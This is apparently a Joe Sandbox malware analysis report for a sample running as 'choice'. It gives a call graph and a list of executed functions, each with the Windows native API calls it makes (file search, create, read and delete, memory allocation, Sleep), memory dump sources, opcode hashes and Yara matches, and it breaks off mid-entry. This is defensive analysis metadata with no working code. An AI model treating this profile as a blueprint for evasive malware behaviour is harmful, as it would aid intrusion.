2b16b30 NtClose LdrInitializeThunk LdrInitializeThunk 99215->99219 99217->99212 99218->99215 99219->99210 99220 2b1b140 99225 2b1ae50 99220->99225 99222 2b1b14d 99239 2b1aac0 99222->99239 99224 2b1b163 99226 2b1ae75 99225->99226 99250 2b18750 99226->99250 99229 2b1afc0 99229->99222 99231 2b1afd7 99231->99222 99232 2b1afce 99232->99231 99234 2b1b0c5 99232->99234 99269 2b1a510 99232->99269 99236 2b1b12a 99234->99236 99278 2b1a880 99234->99278 99237 2b2b9b0 RtlFreeHeap 99236->99237 99238 2b1b131 99237->99238 99238->99222 99240 2b1aad6 99239->99240 99247 2b1aae1 99239->99247 99241 2b2ba90 RtlAllocateHeap 99240->99241 99241->99247 99242 2b1ab05 99242->99224 99243 2b18750 GetFileAttributesW 99243->99247 99244 2b1ae22 99245 2b1ae3b 99244->99245 99246 2b2b9b0 RtlFreeHeap 99244->99246 99245->99224 99246->99245 99247->99242 99247->99243 99247->99244 99248 2b1a510 RtlFreeHeap 99247->99248 99249 2b1a880 RtlFreeHeap 99247->99249 99248->99247 99249->99247 99251 2b18771 99250->99251 99252 2b18778 GetFileAttributesW 99251->99252 99253 2b18783 99251->99253 99252->99253 99253->99229 99254 2b23780 99253->99254 99255 2b2378e 99254->99255 99256 2b23795 99254->99256 99255->99232 99257 2b14960 LdrLoadDll 99256->99257 99258 2b237ca 99257->99258 99259 2b237d9 99258->99259 99282 2b23240 LdrLoadDll 99258->99282 99261 2b2ba90 RtlAllocateHeap 99259->99261 99265 2b23987 99259->99265 99262 2b237f2 99261->99262 99263 2b2397d 99262->99263 99262->99265 99266 2b2380e 99262->99266 99264 2b2b9b0 RtlFreeHeap 99263->99264 99263->99265 99264->99265 99265->99232 99266->99265 99267 2b2b9b0 RtlFreeHeap 99266->99267 99268 2b23971 99267->99268 99268->99232 99270 2b1a536 99269->99270 99283 2b1df40 99270->99283 99272 2b1a5a8 99274 2b1a730 99272->99274 99276 2b1a5c6 99272->99276 99273 2b1a715 99273->99232 99274->99273 99275 2b1a3d0 RtlFreeHeap 99274->99275 99275->99274 99276->99273 99288 2b1a3d0 99276->99288 99279 2b1a8a6 99278->99279 99280 2b1df40 RtlFreeHeap 99279->99280 99281 2b1a92d 99280->99281 99281->99234 99282->99259 99285 2b1df4b 99283->99285 99284 2b1df71 99284->99272 99285->99284 99286 2b2b9b0 RtlFreeHeap 99285->99286 99287 2b1dfb4 99286->99287 99287->99272 99289 2b1a3ed 99288->99289 99292 2b1dfd0 99289->99292 99291 2b1a4f3 99291->99276 99293 2b1dff4 99292->99293 99294 2b1e09e 99293->99294 99295 2b2b9b0 RtlFreeHeap 99293->99295 99294->99291 99295->99294 99296 2b264c0 99297 2b2651a 99296->99297 99299 2b26527 99297->99299 99300 2b23ec0 99297->99300 99301 2b2b920 NtAllocateVirtualMemory 99300->99301 99303 2b23f01 99301->99303 99302 2b2400e 99302->99299 99303->99302 99304 2b14960 LdrLoadDll 99303->99304 99306 2b23f47 99304->99306 99305 2b23f90 Sleep 99305->99306 99306->99302 99306->99305 99307 2b13503 99308 2b18160 2 API calls 99307->99308 99309 2b13513 99308->99309 99310 2b1352f 99309->99310 99311 2b29910 NtClose 99309->99311 99311->99310 99317 2b20540 99318 2b20563 99317->99318 99319 2b14960 LdrLoadDll 99318->99319 99320 2b20587 99319->99320 99321 4a52ad0 LdrInitializeThunk

                                                                                                              Executed Functions

                                                                                                              Function 02B1C9D0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 02B1CAB4
                                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 02B1CAEF
                                                                                                              • FindClose.KERNELBASE(?), ref: 02B1CAFA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 3541575487-0
                                                                                                              • Opcode ID: 48555f95a8cfc974cc5e0977ea0b7e6172ff0cbf03b0566226d691158e60584c
                                                                                                              • Instruction ID: 893e9575f281081b8ff7d3043977ab23be4c86bd48f1396981acd1d191e7764d
                                                                                                              • Opcode Fuzzy Hash: 48555f95a8cfc974cc5e0977ea0b7e6172ff0cbf03b0566226d691158e60584c
                                                                                                              • Instruction Fuzzy Hash: DA31AFB1940348BBDB21DFA4CC85FEF7B7DDB44705F104599B918A6180DBB0AA848FA1
                                                                                                              Function 02B295F0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02B296F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 6fb42e3d6ae03e1ac9befaa09917f92c03d188ed7c7f4fc84a469856cbf3639f
                                                                                                              • Instruction ID: 5578c39667824ef22bc82a93935d3514cf07b28a511d9959ac02ed92c1d6c37e
                                                                                                              • Opcode Fuzzy Hash: 6fb42e3d6ae03e1ac9befaa09917f92c03d188ed7c7f4fc84a469856cbf3639f
                                                                                                              • Instruction Fuzzy Hash: AC31E8B5A11208AFCB14DF98D880EEEB7B9EF88304F108249F919A7340D734A845CFA0
                                                                                                              Function 02B29760 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02B2984F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: 9292feca3341f7b51958626f35d7ae0b2d5491e3ca99dfd0a3e978676a0309dd
                                                                                                              • Instruction ID: 6617e69bfa512ff2ccbfb9b0ebb45c39897e8735ad1e17a689348cc4adb90bd1
                                                                                                              • Opcode Fuzzy Hash: 9292feca3341f7b51958626f35d7ae0b2d5491e3ca99dfd0a3e978676a0309dd
                                                                                                              • Instruction Fuzzy Hash: 1931EAB5A00608AFDB14DF98D880EDFB7B9EF88704F108259F919A7240D774A915CFA1
                                                                                                              Function 02B29A70 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtAllocateVirtualMemory.NTDLL(02B1216E,?,02B2840F,00000000,00000004,00003000,?,?,?,?,?,02B2840F,02B1216E), ref: 02B29B41
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2167126740-0
                                                                                                              • Opcode ID: 40918d9e4e2415ae9b9da49099c1ee6830f0adb71736cde6390b000020622b56
                                                                                                              • Instruction ID: a90e5ed594d7d40a128e3c38b0397a3406bfc56b9e670680caa242221f831f41
                                                                                                              • Opcode Fuzzy Hash: 40918d9e4e2415ae9b9da49099c1ee6830f0adb71736cde6390b000020622b56
                                                                                                              • Instruction Fuzzy Hash: EB2128B5A10609ABDB10DF98DC41FAFBBBAEF88300F008259F91897240D774A915CFA1
                                                                                                              Function 02B29860 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DeleteFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033686569-0
                                                                                                              • Opcode ID: c1199ea468f5ecb06fd265320e87a169c99f261b24ecffb16cb1852cc032a440
                                                                                                              • Instruction ID: 0a6a1e362c1d5c4c1b7a8339a87b1d4eea490bf32e1f4536f56ab5ed7da6be43
                                                                                                              • Opcode Fuzzy Hash: c1199ea468f5ecb06fd265320e87a169c99f261b24ecffb16cb1852cc032a440
                                                                                                              • Instruction Fuzzy Hash: 79119E71A106146AD720EB68DC41FEBB76DEF85714F008289F95CA7280DB74B909CFE1
                                                                                                              Function 02B29910 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02B29941
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: c9ee12a75c3df09896fd10a5e432e13abe3670f004da60ca3f11a9296866f34f
                                                                                                              • Instruction ID: 00ea4e29d97132f80ec0666f17a2dec7e9309e0797d31fb983767e7c79ebbf79
                                                                                                              • Opcode Fuzzy Hash: c9ee12a75c3df09896fd10a5e432e13abe3670f004da60ca3f11a9296866f34f
                                                                                                              • Instruction Fuzzy Hash: E6E046322002147BC220AA5DDC41FABB76DDBC5710F004095FA08A7282C770B9088AB1
                                                                                                              Function 04A52CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 985d1b158d2e100cb23b3fb37c5d119a0299fdeb459747f059f19bd9d9b62533
                                                                                                              • Instruction ID: 9808578003987fbf27d24a01118de16b93fb2d2ebc498a85ddd50431d5e46acc
                                                                                                              • Opcode Fuzzy Hash: 985d1b158d2e100cb23b3fb37c5d119a0299fdeb459747f059f19bd9d9b62533
                                                                                                              • Instruction Fuzzy Hash: AB90027120240402F1007598540864600098BF0305F96D015A9035555EC669D9916131
                                                                                                              Function 04A52C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: aea66506d061342b5ee6123300132f9ff66d3861f3f326e3e59a05464c759150
                                                                                                              • Instruction ID: df838b5e97171bd94380d771443e8632bbb86a5424f10e9c7df23a1c08d02962
                                                                                                              • Opcode Fuzzy Hash: aea66506d061342b5ee6123300132f9ff66d3861f3f326e3e59a05464c759150
                                                                                                              • Instruction Fuzzy Hash: 7990027120240842F10071584404B4600098BF0305F96C01AA4135654D8619D9517521
                                                                                                              Function 04A52C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 321ec6ec6904a6f40f03168b118ebd467cb96aa6564051853fa465279c0c422f
                                                                                                              • Instruction ID: ba3ee23f4e6f41ecd25e7d99c856bdfffbe9122c39eb4afef09d2f8753e6d1b2
                                                                                                              • Opcode Fuzzy Hash: 321ec6ec6904a6f40f03168b118ebd467cb96aa6564051853fa465279c0c422f
                                                                                                              • Instruction Fuzzy Hash: 0E90027120248802F1107158840474A00098BE0305F9AC415A8435658D8699D9917121
                                                                                                              Function 04A52DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: d002273d1bd706e438334a8dafb6aae81922e149841d3b9c16025d0353105cd2
                                                                                                              • Instruction ID: 134499637a4504cdfa3a214d94c4aa1a4da62a91a41b15bdb020fcc792118521
                                                                                                              • Opcode Fuzzy Hash: d002273d1bd706e438334a8dafb6aae81922e149841d3b9c16025d0353105cd2
                                                                                                              • Instruction Fuzzy Hash: 7B90027120240413F11171584504707000D8BE0245FD6C416A4435558D965ADA52A121
                                                                                                              Function 04A52DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 515d1fa1727526dfa567db0db41c5ca660a6aa78cd6c24ecee776c957505a056
                                                                                                              • Instruction ID: 41faeb781e9363e3278be43bf5f99e45b9fc99b7abe9c0fe1720233e211cd65c
                                                                                                              • Opcode Fuzzy Hash: 515d1fa1727526dfa567db0db41c5ca660a6aa78cd6c24ecee776c957505a056
                                                                                                              • Instruction Fuzzy Hash: 52900261243441527545B1584404507400A9BF02457D6C016A5425950C852AE956D621
                                                                                                              Function 04A52D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 7e69b9e669113871b88159c03f3c0b8d51deb9f6b0cb9ae74e7c70335919cff1
                                                                                                              • Instruction ID: 7684d9113f67b22dac0721247ad72e38b17685958e90d855361fa058bb0e177b
                                                                                                              • Opcode Fuzzy Hash: 7e69b9e669113871b88159c03f3c0b8d51deb9f6b0cb9ae74e7c70335919cff1
                                                                                                              • Instruction Fuzzy Hash: B590026921340002F1807158540860A00098BE1206FD6D419A4026558CC919D9695321
                                                                                                              Function 04A52FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 7d15029bfea1220746fe7bc5551cf7fdd32d17a5c83c8bc978c2c3636bb6884b
                                                                                                              • Instruction ID: 90c2d5e666c6f3de1cc45f81f84a244d290954eea3d4016574efa931dcdf2877
                                                                                                              • Opcode Fuzzy Hash: 7d15029bfea1220746fe7bc5551cf7fdd32d17a5c83c8bc978c2c3636bb6884b
                                                                                                              • Instruction Fuzzy Hash: 75900261212C0042F20075684C14B0700098BE0307F96C119A4165554CC919D9615521
                                                                                                              Function 04A52F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: bf219e6002f8d326e052c0f13fa83ef3847ecd00f6871ea9d100982f99718ebc
                                                                                                              • Instruction ID: 876a8cc6e2238785d8ad266bfd619c2ad5c6d82840b251d7a300a903553f0979
                                                                                                              • Opcode Fuzzy Hash: bf219e6002f8d326e052c0f13fa83ef3847ecd00f6871ea9d100982f99718ebc
                                                                                                              • Instruction Fuzzy Hash: CD9002A134240442F10071584414B060009CBF1305F96C019E5075554D861DDD526126
                                                                                                              Function 04A52AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: ebe226f837ed9c6bf4bbeb156f312d393bcbea8b9d0331d21571f454ed8d5433
                                                                                                              • Instruction ID: 63222048c0880cbb481c409ef9df6f39141b2e7751e9e6ce16927ee98c1c111b
                                                                                                              • Opcode Fuzzy Hash: ebe226f837ed9c6bf4bbeb156f312d393bcbea8b9d0331d21571f454ed8d5433
                                                                                                              • Instruction Fuzzy Hash: A2900265222400022145B558060450B04499BE63553D6C019F5427590CC625D9655321
                                                                                                              Function 04A52AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 96369353296d54119c7065daf1c502957506480f094b653c00a62aadaa0e0ac8
                                                                                                              • Instruction ID: 6e97b8558c5d5f3dcd600481a073b83ea99dc2ed7f023ae95479741ad40424b7
                                                                                                              • Opcode Fuzzy Hash: 96369353296d54119c7065daf1c502957506480f094b653c00a62aadaa0e0ac8
                                                                                                              • Instruction Fuzzy Hash: 42900265212400032105B5580704507004A8BE5355396C025F5026550CD625D9615121
                                                                                                              Function 04A52BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 44fc9d5d3f3eb190677adda4370436c5b185aaf27856ae8f3361b63b392c93a0
                                                                                                              • Instruction ID: f9531cb07d7f66009cb9ff67ae3b48d2399511a784528494c93ef3d7491fefb9
                                                                                                              • Opcode Fuzzy Hash: 44fc9d5d3f3eb190677adda4370436c5b185aaf27856ae8f3361b63b392c93a0
                                                                                                              • Instruction Fuzzy Hash: E690027160640802F1507158441474600098BE0305F96C015A4035654D8759DB5576A1
                                                                                                              Function 04A52BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 4a0ee503a95daabef6ec332f1fa77a91377bf04cb07e3c181e7e87cba20bbdcc
                                                                                                              • Instruction ID: 22176bd007ff1c73d5e8db2db5cc8652fb0e3afc24277ecd8b374906d98f8583
                                                                                                              • Opcode Fuzzy Hash: 4a0ee503a95daabef6ec332f1fa77a91377bf04cb07e3c181e7e87cba20bbdcc
                                                                                                              • Instruction Fuzzy Hash: B490027120644842F14071584404A4600198BE0309F96C015A4075694D9629DE55B661
                                                                                                              Function 04A52BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: ac4aef6b55bd4df8a72a66b682a145d0e0033e824d84a1f9fd80d8c13a5d4515
                                                                                                              • Instruction ID: d4af504ac79cd21c71bccc1604232d21a2c9c48246a0473e15a7915a4eea4dc3
                                                                                                              • Opcode Fuzzy Hash: ac4aef6b55bd4df8a72a66b682a145d0e0033e824d84a1f9fd80d8c13a5d4515
                                                                                                              • Instruction Fuzzy Hash: E990027120240802F1807158440464A00098BE1305FD6C019A4036654DCA19DB5977A1
                                                                                                              Function 04A52B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
